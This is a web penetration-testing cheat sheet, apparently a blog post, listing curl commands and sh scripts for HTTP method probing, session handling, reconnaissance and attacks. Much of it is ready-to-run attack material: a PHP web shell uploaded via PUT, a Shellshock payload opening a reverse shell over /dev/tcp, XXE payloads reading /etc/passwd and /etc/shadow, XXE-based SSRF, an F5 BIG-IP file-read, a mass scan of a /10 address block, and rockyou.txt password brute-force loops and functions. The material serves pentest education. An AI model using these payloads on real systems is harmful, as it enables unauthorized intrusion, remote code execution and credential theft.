Web Penetration Testing with Curl Cheatsheet

In many engagements you do not have GUI access to the web application, but curl is installed on almost every test machine, so below is a simple cheat sheet for running basic checks from the command line. In the commands, $URL stands for the target URL (set it first, e.g. URL=https://target/, or replace it by hand).

#GET request using curl (-i also prints the response headers)
curl -i $URL

# Send POST request (form-encoded body)
curl --data "param1=value1&param2=value2" $URL

#Check for TRACE method --> if the request (including its headers) is echoed back in the response body, TRACE is enabled
curl -k -v -X TRACE $URL

#PUT request (-d sends the string as the body; -T uploads a file and defaults to PUT)
curl -X PUT -d "PUT request data" $URL
curl -kL -T file.txt $URL

#HEAD request (response headers only)
curl -I $URL

#Test DEBUG method (ASP.NET debug verb) --> if the response body is "OK" --> DEBUG is enabled
curl -X DEBUG -k -v -H "Command: stop-debug" $URL
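
The method checks above are one-off commands. The following added example (not from the original cheat sheet) wraps them in a small sh script that probes OPTIONS, TRACE, PUT, DELETE and DEBUG against one URL, prints the status code each one gets, and tests TRACE for reflection by sending a marker header and looking for it in the response body. The http://target/ in the usage lines is a placeholder.

```bash
#!/bin/sh
# Added example, not part of the original cheat sheet. Probes a URL for risky
# HTTP methods with curl. Requires only curl and POSIX sh.

# probe_method URL METHOD -> prints the HTTP status code ("000" if curl could not connect)
probe_method() {
    curl -k -s -o /dev/null -w '%{http_code}' -X "$2" "$1"
}

# probe_methods URL -> one line per method, "METHOD status".
# Anything other than 405/501 for PUT, DELETE or DEBUG is worth following up by hand.
probe_methods() {
    url="$1"
    for m in OPTIONS TRACE PUT DELETE DEBUG; do
        printf '%s %s\n' "$m" "$(probe_method "$url" "$m")"
    done
}

# trace_reflects URL -> succeeds (exit 0) when the TRACE response body echoes a
# header we sent, i.e. the server reflects requests (Cross-Site Tracing)
trace_reflects() {
    marker="X-Trace-Probe: $$"
    curl -k -s -X TRACE -H "$marker" "$1" | grep -q "$marker"
}

# Usage (http://target/ is a placeholder):
#   probe_methods http://target/
#   trace_reflects http://target/ && echo "TRACE reflects request headers"
```

A status code alone can mislead: some servers answer 200 to every verb and route it to GET, so confirm PUT and DELETE by writing and removing a harmless file, and confirm TRACE with the reflection check rather than the status.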

#Ignore TLS certificate errors (self-signed, expired or untrusted certificates)
curl -k $URL

#Follow redirects
curl -L $URL

#Add headers to a JSON GET request (-i prints the response headers too)
curl -i -H "Accept: application/json" -H "Content-Type: application/json" $URL

#Add headers to an XML GET request
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET $URL

#XML POST request
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" $URL

#File upload as the request body (-d @file strips newlines; --data-binary @file sends the file unchanged)
curl -X POST --data-binary @filename $URL

#Proxy testing (e.g. route the request through an intercepting proxy such as Burp; $PROXY is something like http://127.0.0.1:8080)
curl -kL https://google.com --proxy $PROXY

Login and Session Management using CURL
#GET request with HTTP Basic login using curl (both forms are equivalent)
curl --user user:pass $URL
curl -u user:pass $URL

#JSON POST request login (credentials in the JSON body, plus Basic auth if the API also expects it)
curl -X POST -H "Content-Type: application/json" -d '{"login":"my_login","password":"my_password"}' --user "login:password" $URL

#curl POST request (JSON body, then a form-encoded body)
curl -X POST -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}' $URL
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2" $URL

#Save the session cookies the server sets (--cookie-jar writes them to the file in Netscape cookie format)
curl --user user:pass --cookie-jar ./somefile $URL

#Reuse the saved session on later requests
curl --cookie ./somefile $URL
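
Once a session has been saved with --cookie-jar, the file is worth reading before you reuse it: it records whether the session cookie was set with the Secure and HttpOnly flags. The following added example (not from the original cheat sheet) parses a cookie jar in the Netscape format curl writes (tab-separated domain, include-subdomains flag, path, secure flag, expiry, name, value; HttpOnly cookies have their domain prefixed with #HttpOnly_) and lists the cookies missing either flag. ./somefile is the file name from the commands above.

```bash
#!/bin/sh
# Added example, not part of the original cheat sheet. Audits the cookie jar
# that "curl --cookie-jar FILE" writes. Requires POSIX sh and awk.

# audit_cookie_jar FILE -> one line per cookie:
#   NAME secure=TRUE|FALSE httponly=yes|no session=yes|no
audit_cookie_jar() {
    awk -F '\t' '
        NF == 0 { next }                             # blank lines
        /^#/ && $1 !~ /^#HttpOnly_/ { next }         # comments, but keep #HttpOnly_ entries
        NF >= 7 {
            httponly = ($1 ~ /^#HttpOnly_/) ? "yes" : "no"
            session  = ($5 == 0) ? "yes" : "no"      # expiry 0 = session cookie
            printf "%s secure=%s httponly=%s session=%s\n", $6, $4, httponly, session
        }' "$1"
}

# weak_cookies FILE -> names of cookies that lack Secure or HttpOnly
weak_cookies() {
    audit_cookie_jar "$1" | awk '$2 != "secure=TRUE" || $3 != "httponly=yes" { print $1 }'
}

# Usage, after "curl --user user:pass --cookie-jar ./somefile $URL":
#   audit_cookie_jar ./somefile
#   weak_cookies ./somefile
```

A session cookie reported without Secure can be replayed from plain-HTTP captures, and one without HttpOnly is readable by injected script; both go straight into the findings, and the jar file itself holds a live session, so delete it when the test is over.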

#Login with Authorization: Basic
curl --basic -v -u root:root $URL

#Login with Digest authorization
curl -v --digest --user 'admin:admin' $URL

#Upload a PHP web shell using the PUT method (the target path has to be one the server executes as PHP)
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' $URL

Information Gathering using CURL

#Iterate a number from 1 to 20 in the URL and compare the page titles to spot which ones differ
for i in $(seq 1 20); do echo -n "$i: "; curl -s "${URL}${i}/" | grep '<title>'; done

#Get all the links from a page
curl -s -L $URL | grep "title\|href" | sed -e 's/^[[:space:]]*//'

#Get the page text in a more readable format (requires html2text)
curl -s -L $URL | html2text -width '99' | uniq

#Finding hosts that answer with HTTP Basic authorization (scans 100.64.0.0/10 on ports 80 and 8080 with GNU parallel, 250 jobs at a time, and records every host that returns "Unauthorized")
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt

#Exploiting Shellshock using curl (reverse shell from a vulnerable CGI script back to your listener at $LHOST:$LPORT)
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" $URL

#XXE - when you find a /soap or /soap/servlet/rpcrouter directory (read local files through an external entity)
curl -kL -H "Content-Type: text/xml" -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>' $URL

curl -kL -H "Content-Type: text/xml" -X POST -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>' $URL

#XXE used for SSRF (the server itself fetches the external URL)
curl -kL -H "Content-Type: text/xml" -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>' $URL

#LFI on Apache httpd in front of F5 BIG-IP (TMUI fileRead.jsp; --cipher avoids the weak-DH handshake error below)
curl -kL --cipher 'DEFAULT:!DH' "$URL;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"

Brute forcing using Curl

#One liner (prints the HTTP status for each candidate; anything but 401 is a hit to check by hand; reading line by line keeps passwords that contain spaces intact)
while IFS= read -r pass; do echo -n "$pass: "; curl -k -s -o /dev/null -w '%{http_code}\n' -u root:"$pass" $URL; done < /usr/share/wordlists/rockyou.txt

#Better for readability (Digest auth; stops at the first password that is not rejected with 401; 000 means curl could not connect)
while IFS= read -r pass; do
	http_code=$(curl -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s $URL)
	if [[ $http_code -eq 000 ]]; then
		echo "Connection failed"
		break
	elif [[ $http_code -ne 401 ]]; then
		echo "Password Cracked: $pass"
		break
	else
		echo "Wrong Password: '$pass' --- '$http_code'"
	fi
done < /usr/share/wordlists/rockyou.txt
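
The loops above are one-shot. The following added example (not from the original cheat sheet) is the same Basic/Digest password guessing written as reusable sh functions: it first confirms that a deliberately wrong password gets a 401 (otherwise the URL is not actually protected and every guess would look like a hit), reads the wordlist line by line so passwords containing spaces survive, stops at the first password that is not rejected with 401, and treats a 000 status (curl could not connect) as an error rather than a success. $URL and the wordlist path are placeholders you supply.

```bash
#!/bin/sh
# Added example, not part of the original cheat sheet. Online password guessing
# against HTTP Basic or Digest auth with curl. Requires POSIX sh and curl.

# try_login URL USER PASS [basic|digest] -> prints the HTTP status code
# ("000" when curl could not connect)
try_login() {
    curl -k -s -o /dev/null -w '%{http_code}' "--${4:-basic}" -u "$2:$3" "$1"
}

# brute_auth URL USER WORDLIST [basic|digest]
#   prints the first password that is not rejected with 401 and returns 0;
#   returns 1 when the wordlist is exhausted, 2 on a connection failure or
#   when a wrong password does not get a 401 (the URL is not challenging us).
brute_auth() {
    url="$1"; user="$2"; wordlist="$3"; scheme="${4:-basic}"

    # baseline: a password that is certainly wrong must be rejected with 401
    baseline=$(try_login "$url" "$user" "not-the-password-$$" "$scheme")
    if [ "$baseline" != 401 ]; then
        echo "expected 401 for a wrong password, got $baseline" >&2
        return 2
    fi

    # read -r keeps backslashes, IFS= keeps leading/trailing spaces,
    # and the || [ -n "$pass" ] handles a last line without a newline
    while IFS= read -r pass || [ -n "$pass" ]; do
        code=$(try_login "$url" "$user" "$pass" "$scheme")
        case "$code" in
            401) ;;                                   # wrong password, keep going
            000) echo "could not connect to $url" >&2; return 2 ;;
            *)   printf '%s\n' "$pass"; return 0 ;;   # 200, 302, 403 ... verify by hand
        esac
    done < "$wordlist"
    return 1
}

# Usage ($URL and the wordlist path are placeholders):
#   brute_auth "$URL" admin /usr/share/wordlists/rockyou.txt digest
```

This is an online attack: every guess is a request the target logs, and many applications lock the account after a handful of failures, so agree the account and rate with the client before pointing rockyou.txt at it.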

OpenSSL Errors

#Resolving "SSL routines ... dh key too small" (the server offers a Diffie-Hellman key OpenSSL refuses; excluding the DH ciphers lets the handshake pick another key exchange)
curl -kL --cipher 'DEFAULT:!DH' $URL

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and Mechanical Engineer. He enjoys writing articles, blogging, debugging errors and capture-the-flag challenges. Enjoy learning; there is nothing like absolute defeat - try and try until you succeed.
